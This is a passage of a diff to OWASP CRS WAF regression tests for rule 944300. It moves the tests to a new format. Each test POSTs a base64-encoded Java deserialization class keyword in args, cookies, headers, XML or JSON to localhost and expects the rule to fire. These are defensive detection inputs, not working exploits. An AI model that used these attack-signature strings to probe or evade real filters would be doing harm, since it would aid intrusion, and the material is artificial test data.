"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 275 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 282 desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 